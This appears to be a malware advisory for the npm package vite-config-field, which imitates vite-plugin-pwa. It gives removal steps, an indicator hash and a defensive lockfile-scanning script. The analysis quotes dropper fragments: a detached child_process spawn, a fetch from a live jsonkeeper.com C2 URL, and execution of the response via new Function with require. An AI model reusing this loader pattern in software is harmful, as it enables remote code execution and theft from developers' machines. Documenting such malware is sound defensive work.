Malicious package

vite-config-field (npm)

Malicious code in vite-config-field (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5936
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall vite-config-field

What this malware does

The package impersonates the legitimate vite-plugin-pwa: it clones the description ('Zero-config PWA for Vite'), lists the repository vite-pwa/vite-config-field, carries a funding link to github.com/sponsors/antfu, and ships exports matching the upstream API, including VitePWA, cachePreset, and configField.

When a consumer adds the plugin to their Vite config and the exported configField() runs, it invokes getUseropt(), which calls child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' }) and unrefs the child.

The spawned dist/client/dev/reactopt.js performs axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } }), takes response.data.Cookie, and executes it with new Function('require', s)(require). This is arbitrary remote code execution with full require capability, retrying 5 times.

The C2 URL is disguised inside a fake process.env object (DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) so that it looks like environment-variable reads, and console output is silenced around the eval. Because the child is detached and its stdio is ignored, the dropper survives independently of the parent build/dev process.

Malicious versions

1 flagged
1.1.2

Indicators of compromise (SHA-256)

d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f

Frequently asked questions

No. vite-config-field on npm has been identified as a malicious package (version 1.1.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.
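
To confirm that no copy remains in the dependency tree after the uninstall, the lockfile can be checked for nested and aliased installs as well as direct ones. The following is an added example, not code from the advisory or its tooling; findInLockfile, FLAGGED and SAMPLE_LOCK are hypothetical names, and the sample lockfile is constructed.

```javascript
// Added example: find every copy of the package named in this advisory in a
// package-lock.json, including nested (transitive) and aliased installs.
const FLAGGED = { name: 'vite-config-field', versions: ['1.1.2'] }; // from the advisory

function findInLockfile(lockText, pkg = FLAGGED) {
  const lock = JSON.parse(lockText);
  const hits = new Map(); // install path -> version
  // lockfileVersion 2/3: flat "packages" map keyed by install path.
  // An aliased install carries the real package name in "name".
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = meta.name || path.split('node_modules/').pop();
    if (path !== '' && name === pkg.name) hits.set(path, meta.version);
  }
  // lockfileVersion 1 (mirrored in v2): nested "dependencies" tree.
  // An aliased install appears as version "npm:<real-name>@<version>".
  const alias = `npm:${pkg.name}@`;
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      const v = String(meta.version || '');
      if (name === pkg.name) hits.set(path, v);
      else if (v.startsWith(alias)) hits.set(path, v.slice(alias.length));
      walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, '');
  return [...hits].map(([path, version]) => ({
    path, version, flaggedVersion: pkg.versions.includes(version),
  }));
}

// Constructed sample lockfile (lockfileVersion 3); every name and version
// other than vite-config-field 1.1.2 is made up for the example.
const SAMPLE_LOCK = JSON.stringify({
  name: 'demo-app', lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'example-ui-kit': '^2.0.0' } },
    'node_modules/example-ui-kit': { version: '2.0.1' },
    'node_modules/example-ui-kit/node_modules/vite-config-field': { version: '1.1.2' },
    'node_modules/pwa-helper': { name: 'vite-config-field', version: '1.1.2' },
    'node_modules/vite': { version: '5.4.0' },
  },
});

for (const hit of findInLockfile(SAMPLE_LOCK)) {
  console.log(`${hit.path} @ ${hit.version}${hit.flaggedVersion ? ' (flagged version)' : ''}`);
}
```

In a project, pass the text of package-lock.json to findInLockfile and treat any hit, flagged version or not, as a reason to remove the package and rotate secrets.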

Campaign

IN-MAL-2026-006846

Credits

  • Amazon Inspector · finder
